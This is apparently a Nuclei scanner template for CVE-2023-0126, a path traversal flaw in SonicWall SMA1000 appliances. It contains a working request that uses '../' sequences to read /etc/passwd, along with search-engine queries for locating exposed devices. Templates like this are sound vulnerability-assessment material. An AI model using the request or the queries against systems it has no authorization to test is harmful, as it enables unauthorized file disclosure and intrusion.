id: CVE-2023-0126 info: name: SonicWall SMA1000 LFI author: tess severity: high description: | Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0126 - https://github.com/advisories/GHSA-mr28-27qx-phg3 - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001 - https://github.com/Gerxnox/One-Liner-Collections - https://github.com/thecybertix/One-Liner-Collections classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 epss-score: 0.29128 epss-percentile: 0.96882 cpe: cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: sonicwall product: sma1000 shodan-query: title:"Appliance Management Console Login" fofa-query: title="appliance management console login" google-query: intitle:"appliance management console login" tags: cve2023,cve,sonicwall,lfi,sma1000 http: - method: GET path: - '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd' matchers-condition: and matchers: - type: word part: header words: - content/unknown - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 4b0a00483046022100cf33c281aac014812de31f1d2e6ee14c6784d3b2360cfbbb3b77d83ada2102f4022100d98e1e4661863d6887d334c68f10ef2f737a295dcb0b074c45094f4b9aaadb7d:922c64590222798bb761d5b6d8e72950